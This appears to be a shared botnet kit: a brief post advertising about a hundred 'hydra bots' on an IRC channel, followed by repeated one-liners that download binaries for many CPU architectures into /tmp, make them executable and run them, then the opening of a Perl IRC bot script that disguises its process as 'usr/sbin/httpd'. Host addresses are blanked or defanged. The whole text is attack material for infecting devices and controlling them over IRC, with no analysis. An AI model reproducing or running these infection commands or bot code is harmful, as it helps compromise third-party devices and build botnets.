Around 100 hydra bots inside.
Server :
Channel : #perls
Url’s :
hxxp:// u can get the rest of files here :
cd /tmp && wget -q hxxp:// && chmod +x telmipsel && ./telmipsel
cd /tmp && wget -q hxxp:// && chmod +x telmips && ./telmips
cd /tmp && wget -q hxxp:// && chmod +x telsh4 && ./telsh4
cd /tmp && wget -q hxxp:// && chmod +x telx86 && ./telx86
cd /tmp && wget -q hxxp:// && chmod +x telarmv6 && ./telarmv6
cd /tmp && wget -q hxxp:// && chmod +x teli686 && ./teli686
cd /tmp && wget -q hxxp:// && chmod +x telpowerpc && ./telpowerpc
cd /tmp && wget -q hxxp:// && chmod +x teli586 && ./teli586
cd /tmp && wget -q hxxp:// && chmod +x telm86k && ./telm86k
cd /tmp && wget -q hxxp:// && chmod +x telsparc && ./telsparc
cd /tmp && wget -q hxxp:// && chmod +x telarmv5l && ./telarmv5l
cd /tmp && wget -q hxxp:// && chmod +x telarmv4l && ./telarmv4l
rm -rf tel*
cd /tmp && busybox wget -q hxxp:// && chmod +x telmipsel && ./telmipsel
cd /tmp && busybox wget -q hxxp:// && chmod +x telmips && ./telmips
cd /tmp && busybox wget -q hxxp:// && chmod +x telsh4 && ./telsh4
cd /tmp && busybox wget -q hxxp:// && chmod +x telx86 && ./telx86
cd /tmp && busybox wget -q hxxp:// && chmod +x telarmv6 && ./telarmv6
cd /tmp && busybox wget -q hxxp:// && chmod +x teli686 && ./teli686
cd /tmp && busybox wget -q hxxp:// && chmod +x telpowerpc && ./telpowerpc
cd /tmp && busybox wget -q hxxp:// && chmod +x teli586 && ./teli586
cd /tmp && busybox wget -q hxxp:// && chmod +x telm86k && ./telm86k
cd /tmp && busybox wget -q hxxp:// && chmod +x telsparc && ./telsparc
cd /tmp && busybox wget -q hxxp:// && chmod +x telarmv5l && ./telarmv5l
cd /tmp && busybox wget -q hxxp:// && chmod +x telarmv4l && ./telarmv4l
rm -rf tel* :
my $processo = ‘usr/sbin/httpd’;
my $linas_max=’10’;
my $sleep=’5′;
my $cmd=””;
my $id=””;
my @adms=(“john”);
my @canais=(“#perls”);
my $chanpass = “”;
$num = int rand(99999);
my $nick = “[-]” . $num . “”;
#Nickname of bot
my $ircname ='[HACKED]’;
chop (my $realname = ‘[IMGAY]’);
#IRC name and Realname
$servidor=’′ unless $servidor;
my $porta=’6667′;
$SIG{‘PS’} = ‘IGNORE’;
use IO::Socket;
use Socket;
use IO::Select;
$servidor=”$ARGV[0]” if $ARGV[0];